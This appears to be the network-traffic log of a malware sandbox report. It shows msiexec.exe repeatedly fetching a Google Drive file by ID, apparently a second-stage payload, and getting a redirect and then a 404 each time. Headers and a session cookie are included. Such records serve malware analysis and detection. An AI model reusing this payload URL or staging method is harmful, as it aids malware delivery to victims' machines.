                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:01:53 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:53 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-XuFM9vMeM4fo_t-Wtt5UfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.849711172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:01:54 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:01:54 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSloQ9RxKEPo9SzUbDBRPO4H9dzZ5jz4K-fyghXAw8HwyuyzCFupqva2xA9587GAb5nBnw3mPM
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:54 GMT
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-cJU_FO-jrWcL_qZyu1R88g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:01:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 36 78 47 50 54 48 52 38 77 65 61 48 30 44 61 4a 75 5f 6e 72 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y6xGPTHR8weaH0DaJu_nrA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.849712216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:01:55 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:01:55 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:55 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-iTji9RJujhrRmpTSdtTn_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.849713172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:01:56 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:01:56 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC6ZwitzzDVHzMaZHbt_fI4HrJDIW3jeotQvOFG2RIDmnH51xvf4XYYgG16uq6IS7qoOyyeZeTk
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:56 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-bgjapu7qhWEIRpelNOMYiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:01:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 45 49 66 65 6f 74 71 4d 6e 55 44 54 58 31 57 77 4d 4f 7a 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PEIfeotqMnUDTX1WwMOzRA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.849714216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:01:57 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:01:58 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:57 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-wTby2aqEQbgfcTwus0auEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.849715172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:01:58 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:01:59 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgQVhbHzprAn3s_zF5XDSyutG2HCIF0awcD_dJaX7VHvJRzHB2IDfk25flWul1MBzWF8
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:01:59 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-hV3rwzJN_1gZUwwRYtxpNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:01:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 6b 45 30 72 38 5a 6c 39 57 43 4f 4e 49 73 71 5f 53 6b 69 4d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jkE0r8Zl9WCONIsq_SkiMQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.849716216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:00 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:00 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:00 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-zNU86rFcacGQNBS5G1Kw6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.849717172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:01 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:01 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgRDnqHm8BefEH3lod5D9UW2z172mmK7GUhPOBlLLoO8-kbEwzi1bnAyLNVkV_0hzG56
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:01 GMT
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-NA0wlWkxkYa9x389Mga2IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
